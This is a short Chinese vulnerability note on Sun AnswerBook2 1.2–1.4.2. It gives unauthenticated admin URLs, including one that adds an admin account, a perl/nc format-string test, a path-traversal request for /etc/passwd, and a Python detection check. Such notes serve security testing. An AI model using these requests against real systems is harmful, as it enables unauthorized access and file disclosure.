一、未授权管理脚本访问漏洞:

1、受影响版本:

Sun-AnswerBook2     1.2-1.4.2

2、攻击测试手段

http://a.b.c.d:8888/ab2/@AdminViewError#访问错误日志

http://a.b.c.d:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar#添加账户(密码)

二、远程格式化字符串漏洞

1、受影响版本:

Sun-AnswerBook2     1.2-1.4.2

2、攻击测试手段:

1 perl -e 'print"GET /";print"%x"x20;print" HTTP/1.0\r\n\r\n\r\n"' | nc localhost 8888

应该可以看到如下报错:

http-8888 [23/Sep/2000:13:09:37 -0700] warning: send-file reports: The 
requested object "/usr/lib/ab2/data/docs/0fea19f580073656e642d66696c6520 
7265706f7274733a2054686520726571756573746564206f626a65637420222f7573722f6 
c69622f6162322f646174612f646f63732f" could not be opened!

任意文件读取(有些HTTP-Proxy也有这个漏洞):

直接连接connect漏洞主机的对应的端口()

发送Payload

1 GET /../../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n

就可以得到对应的文件内容

参考巡风的POC:

 1 def check(ip, port, timeout):
 2     try:
 3         socket.setdefaulttimeout(timeout)
 4         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 5         s.connect((ip, int(port)))
 6         flag = "GET /../../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n"
 7         s.send(flag)
 8         data = s.recv(1024)
 9         s.close()
10         if 'root:' in data and 'nobody:' in data:
11             return u"漏洞"
12     except:
13         pass

转载于:https://www.cnblogs.com/KevinGeorge/p/8087270.html

Sun公司的产品AnswerBook存在多种漏洞相关推荐

  1. 从Oracle收购Sun 公司谈起

    4 月20日,Sun 公司董事会通过决议,同意以每股9.5美元的价格将公司出售给Oracle.虽然还有一些必要的审查和手续,但是两家公司的合并,看起来是不可避免的了.一时间,很多IT领域的朋友众说纷纭 ...

  2. 了解Sun公司的历史以及现状

    了解Sun公司的历史以及现状 升阳微系统公司(Sun Microsystems,简称Sun)在自己的广告中宣称:我们就是.com前面那一点(We are the dot in the .com),这并 ...

  3. 参加Sun公司的新产品的发布会议

    在2004年的最后阶段,能收到Sun公司的邀请函,去参加"Sun秋季产品发布会",是在沈阳的丽都喜来登酒店,幸运的是,这次地点是上次微软公司msdn发布会的邻居,也是五星级别的.不 ...

  4. 且看微软的.Net和Sun公司的J2EE如何对垒

    且看微软的.Net和Sun公司的J2EE如何对垒[url]http://tech.163.com[/url] 2006-03-21 20:21:05 来源: sun 网友评论0 条论坛导读:面对微软推 ...

  5. 开发Java,市值一度超过两千亿美元,造福无数程序员的Sun公司,也最终“陨落”...

    "那些疯狂到认为自己能够改变世界的人,才是真正能够改变世界的人." 这是乔布斯曾说过的话,也是很多技术大佬都会坚守的信念.最突出的表现则在于他们性格方面足够的特立独行,甚至是有些偏 ...

  6. Ubiquiti几十款无线产品爆出命令注入漏洞 是因为没有升级老版本的PHP 据说厂商还未给出补丁...

    Ubiquiti Networks公司提供的几十款产品中存在紧急漏洞,该漏洞可用于劫持设备.这个漏洞已于11月上报给了该厂商,但目前厂商尚未发布补丁修复大多数受影响的设备. 命令注入漏洞来自于没有升级 ...

  7. VMware 多款产品中存在严重漏洞

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 VMware 提醒客户立即修复位于多款产品中的严重漏洞,它们可被用于发动远程代码执行攻击. 本周三,VMware 提醒称,"应该按照 ...

  8. 【工业设计公司】产品外观设计的重要性

    在每个设计工作中,产品的外观设计是必不可少的.对于设计公司来说,如何合理的产品外观设计是每个设计公司都要考虑的问题.一个优秀的工业品一般要从产品形状.色彩.材质三个符号来体现产品外观的视觉形象.下面我 ...

  9. sun公司:太阳的升起与衰落

    Sun 是一个在计算机发展史上有着重要历史地位的公司,2009 年被 Oracle 收购.Sun 的发展经历过升起和壮大,又经历过衰败和陨落.今天我就来分享 Sun 是怎么创业并发展壮大的. < ...

最新文章

  1. (十五)java数组
  2. 清除messages
  3. How to resolve warning message Access restriction -The type Resource is not accessible
  4. vue在less中使用css3 calc 被解析 的问题
  5. 轉:VB6中将数据导出到Excel提速之法
  6. BZOJ 4538: [Hnoi2016]网络
  7. hbuilder怎么设置网页的大小_怎么免费将图片转成PDF?这个方法超简单
  8. [CM311-1A]-全网最全 Android 用户管理及用户应用权限
  9. MySql设置远程连接
  10. 产品经理/技术总监的能力模型
  11. opencv Mat 16位unsigned数据显示为黑色
  12. js案例01-设置光标到指定input
  13. 苹果Swift语言入门教程
  14. Daily Scrum Meeting 11.13
  15. 现在开发人员都开始做测试了,是不是以后就没有软件测试人员了?
  16. 基于丝袜哥的knife4j,您值得拥有!
  17. Trusted Applications介绍
  18. 关于mikefile 萌新用法
  19. Java语言每日一练—第14天:银行收入计算
  20. VMware12版虚拟机怎么安装win7系统

热门文章

  1. mongodb3.2系统性学习——5、游标 模糊查询 findAndModify函数
  2. AngularJS之禅
  3. 《那些年啊,那些事——一个程序员的奋斗史》——117
  4. requests---requests简介
  5. Mysql8.0 3306端口无法远程连接
  6. 使用消息队列实现分布式事务-公认较为理想的分布式事务解决方案(转)
  7. 输入一个正整数,求它各位数的数字之和
  8. ibatis解决sql注入问题 .
  9. JBoss下布署Spring2.5和Struts2系统
  10. 返朴归真,也谈面向对象编程的几个原则